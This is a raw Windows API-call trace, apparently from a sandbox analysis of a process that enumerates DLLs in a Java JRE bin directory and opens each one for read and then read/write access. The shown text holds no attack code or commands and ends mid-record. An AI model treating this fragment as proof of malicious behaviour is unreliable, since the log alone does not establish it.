HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0093.222] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.222] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.222] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7a40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jsoundds.dll", cAlternateFileName="")) returned 1 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0093.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0093.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0093.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0093.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0093.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0093.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0093.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0093.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0093.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0093.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0093.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0093.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.223] AreFileApisANSI () returned 1 [0093.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll", lpUsedDefaultChar=0x0) returned 52 [0093.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0093.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0093.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0093.224] AreFileApisANSI () returned 1 [0093.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0093.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 52 [0093.224] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.224] GetFileType (hFile=0x360) returned 0x1 [0093.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0093.224] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.224] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.224] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.225] CloseHandle (hObject=0x360) returned 1 [0093.225] AreFileApisANSI () returned 1 [0093.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0093.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 52 [0093.225] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.225] GetFileType (hFile=0x360) returned 0x1 [0093.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0093.225] CloseHandle (hObject=0x360) returned 1 [0093.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0093.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.226] AreFileApisANSI () returned 1 [0093.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0093.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46278, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll") returned 52 [0093.226] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7a40)) returned 1 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0093.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.226] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x35e40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="kcms.dll", cAlternateFileName="")) returned 1 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0093.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0093.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0093.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0093.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.227] AreFileApisANSI () returned 1 [0093.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll", lpUsedDefaultChar=0x0) returned 48 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0093.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0093.228] AreFileApisANSI () returned 1 [0093.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0093.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 48 [0093.228] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.228] GetFileType (hFile=0x360) returned 0x1 [0093.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0093.228] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.228] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.229] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.229] CloseHandle (hObject=0x360) returned 1 [0093.229] AreFileApisANSI () returned 1 [0093.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0093.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 48 [0093.229] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.229] GetFileType (hFile=0x360) returned 0x1 [0093.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0093.229] CloseHandle (hObject=0x360) returned 1 [0093.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.230] AreFileApisANSI () returned 1 [0093.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0093.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 48 [0093.230] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, 